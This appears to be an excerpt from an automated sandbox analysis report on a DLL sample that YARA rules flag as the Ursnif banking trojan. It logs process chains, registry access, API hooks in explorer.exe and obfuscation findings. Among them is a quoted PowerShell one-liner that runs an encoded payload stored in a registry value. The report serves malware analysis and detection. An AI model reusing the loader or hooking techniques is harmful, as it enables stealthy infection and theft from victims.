Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 948
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\E443.bi1'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82966 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17432 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17436 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\E443.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.450360033.0000022419D70000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.459689386.0000016299730000.00000002.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.pdb source: powershell.exe, 00000017.00000002.537912981.0000028A03105000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.497705929.0000000007BA0000.00000002.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000025.00000003.495060225.0000000004EB3000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.pdbXP source: powershell.exe, 00000017.00000002.537912981.0000028A03105000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.pdb source: powershell.exe, 00000017.00000002.537912981.0000028A03105000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000025.00000003.497314240.000000000303C000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000025.00000003.497314240.000000000303C000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.473952446.00000000062A0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.513874713.00000000078A0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.473952446.00000000062A0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.513874713.00000000078A0000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.495294633.0000000003030000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 0000001F.00000002.491986987.000002B01878C000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000025.00000003.496380525.0000000003036000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 0000001F.00000002.491986987.000002B01878C000.00000004.00000040.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.pdbXP source: powershell.exe, 00000017.00000002.538073248.0000028A0317E000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.497705929.0000000007BA0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000025.00000003.495294633.0000000003030000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'

PE file contains sections with non-standard names

Source: 5fd885c499439tar.dll	Static PE information: section name: .applaus
Source: 5fd885c499439tar.dll	Static PE information: section name: .isatic

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAB0CB push ecx; ret		1_2_04FAB0DB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAAD10 push ecx; ret		1_2_04FAAD19

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
